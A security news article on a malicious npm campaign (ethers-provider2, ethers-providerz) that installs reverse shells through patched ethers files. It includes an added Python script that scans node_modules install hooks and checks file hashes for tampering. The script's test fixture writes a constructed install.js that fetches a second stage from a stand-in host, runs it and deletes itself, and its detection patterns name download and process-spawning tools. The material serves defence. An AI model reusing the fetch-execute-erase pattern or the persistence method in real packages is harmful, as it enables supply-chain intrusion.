A newly discovered malware campaign has leveraged malicious npm packages to deliver highly sophisticated reverse shells.
Researchers at ReversingLabs identified two malicious packages, “ethers-provider2” and “ethers-providerz,” which infiltrated development environments by covertly modifying legitimate npm dependencies.
The ethers-provider2 package closely mimics the legitimate ssh2 package, embedding harmful code within its installation script. Upon execution, the script downloads a second-stage payload from an external server, executing it before erasing any traces of the download.
This payload continuously monitors for the installation of the legitimate ethers package and, once detected, replaces a key file with a compromised version that retrieves a third-stage payload. Finally, it establishes a reverse shell connection to the attacker’s server.
Similarly, ethers-providerz attempts to patch files within @ethersproject/providers, but researchers noted that the malicious code contains incorrect file paths, which suggests incomplete implementation. Despite these flaws, the intent remained clear: infect commonly used npm packages with hidden backdoors.
Stealth and Persistence in npm Malware
Unlike typical npm-based malware, these packages ensure that removing the infected npm package does not eliminate its impact. If the ethers package is reinstalled after ethers-provider2 has been executed, the malicious modifications will be reintroduced, allowing continued access for the attackers.
These findings highlight the increasing sophistication of software supply chain attacks. While infostealers remain a common threat in the npm ecosystem, this campaign demonstrates an evolution in attacker tactics, focusing on long-term persistence and stealth.
Notably, the malicious code was only injected into locally installed npm packages – there was no compromise of the official ethers package.
Detection and Response
ReversingLabs detected these packages using its Spectra platform, which flagged the modified installation scripts as suspicious. Despite low download numbers, the company warned that the risk remains substantial, particularly if such tactics are used against more popular npm packages in future attacks.
The ethers-providerz package has since been removed from npm, while ethers-provider2 remains available at the time of writing.
To mitigate the risk, ReversingLabs developed a YARA rule to identify systems where the ethers package has been modified.
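The two behaviours described above, an install hook that fetches a second stage and then erases its own traces, and a later in-place modification of an already-installed package that survives reinstallation, call for two different local checks. The following is an added example written for this page, not ReversingLabs' YARA rule or any tooling from the campaign: a small Python triage script that (1) scans a node_modules tree for npm lifecycle hooks (preinstall, install, postinstall, prepare) and flags hook commands or the JavaScript files they run for download, process-spawning and self-deletion indicators, and (2) takes a SHA-256 baseline of node_modules so that files changed after the fact, as with the patched ethers file in the article, can be listed. All package names, file contents and the example.invalid URL in the fixture are constructed for the demonstration.

```python
# Added example (not ReversingLabs' tooling): triage npm lifecycle hooks in a
# node_modules tree and baseline file hashes to detect post-install tampering.
# Package names, scripts and URLs in build_fixture() are constructed.
import hashlib
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators for the hook command itself (values under "scripts" in package.json).
COMMAND_INDICATORS = [
    (re.compile(r"\b(curl|wget)\b"), "download tool in hook"),
    (re.compile(r"https?://"), "remote URL in hook"),
    (re.compile(r"\bnode\s+-e\b"), "inline node eval in hook"),
]

# Indicators for a JavaScript file that the hook runs via `node <file>`.
SCRIPT_INDICATORS = [
    (re.compile(r"require\(['\"](https?|child_process)['\"]\)"), "network/process module"),
    (re.compile(r"https?://"), "remote URL in script"),
    (re.compile(r"\b(unlinkSync|rmSync|unlink)\s*\("), "file deletion (trace removal)"),
    (re.compile(r"\bexec(Sync)?\s*\("), "command execution"),
]

# Matches hook commands of the form "node some/file.js ..." and captures the file.
NODE_FILE = re.compile(r"^\s*node\s+([^\s&|;]+\.[cm]?js)\b")


def _matches(text, indicators):
    """Labels of every indicator regex that occurs in text."""
    return [label for rx, label in indicators if rx.search(text)]


def inspect_package(pkg_dir: Path):
    """Return a finding dict if any lifecycle hook of pkg_dir looks suspicious, else None."""
    try:
        meta = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None
    scripts = meta.get("scripts") or {}
    reasons = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons += [f"{hook}: {r}" for r in _matches(cmd, COMMAND_INDICATORS)]
        m = NODE_FILE.match(cmd)
        if m:
            target = pkg_dir / m.group(1)
            if target.is_file():
                body = target.read_text(encoding="utf-8", errors="replace")
                reasons += [f"{hook} -> {m.group(1)}: {r}"
                            for r in _matches(body, SCRIPT_INDICATORS)]
    if not reasons:
        return None
    return {"package": meta.get("name", pkg_dir.name), "path": str(pkg_dir), "reasons": reasons}


def triage(node_modules: Path):
    """Walk node_modules (nested and scoped packages included) and collect findings."""
    findings = []
    for pkg_json in sorted(node_modules.rglob("package.json")):
        finding = inspect_package(pkg_json.parent)
        if finding:
            findings.append(finding)
    return findings


def snapshot(node_modules: Path):
    """Map every file under node_modules to its SHA-256; take this right after a clean install."""
    return {p.relative_to(node_modules).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in node_modules.rglob("*") if p.is_file()}


def changed_files(before, after):
    """Files whose content differs from the baseline or that appeared since it was taken."""
    return sorted(k for k, v in after.items() if before.get(k) != v)


def build_fixture() -> Path:
    """Constructed node_modules tree: a benign native package plus a package whose
    postinstall script carries the fetch / execute / self-delete indicators."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    benign = root / "benign-native"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"name": "benign-native", "scripts": {"install": "node-gyp rebuild"}}))
    bad = root / "constructed-suspicious-pkg"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps(
        {"name": "constructed-suspicious-pkg", "scripts": {"postinstall": "node install.js"}}))
    (bad / "install.js").write_text(
        "const https = require('https');\n"
        "const { execSync } = require('child_process');\n"
        "// constructed stand-in carrying the indicators; example.invalid never resolves\n"
        "https.get('http://example.invalid/stage2', () => {});\n"
        "execSync('node stage2.js');\n"
        "require('fs').unlinkSync(__filename);\n")
    return root


if __name__ == "__main__":
    root = build_fixture()
    for f in triage(root):
        print(f["package"], "->", "; ".join(f["reasons"]))
```

The hook scan is a heuristic: native modules legitimately use install hooks (the benign fixture is not flagged), so findings are a review queue, not a verdict. The hash baseline is what catches the persistence trick from the article, since a package patched after installation has no suspicious hook of its own; re-running snapshot() after every install and diffing against the baseline surfaces the modified file regardless of which package wrote it.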
Further investigation uncovered additional related packages, “reproduction-hardhat” and “@theoretical123/providers,” both removed from npm after researchers reported their malicious behavior.
“This latest campaign is evidence that the risk of downloading malware and compromising development environments and networks remains high, while novel ways of serving malicious payloads are emerging,” ReversingLabs wrote.
“What is even more ominous with this current threat: Even if the malicious package ethers-provider2 is removed, the threat actors made sure their malicious functionality would persist. This highlights the importance of being alert to supply chain threats and attacks since there are many malicious packages lurking on npm, serving malware in novel and not-so-novel ways.”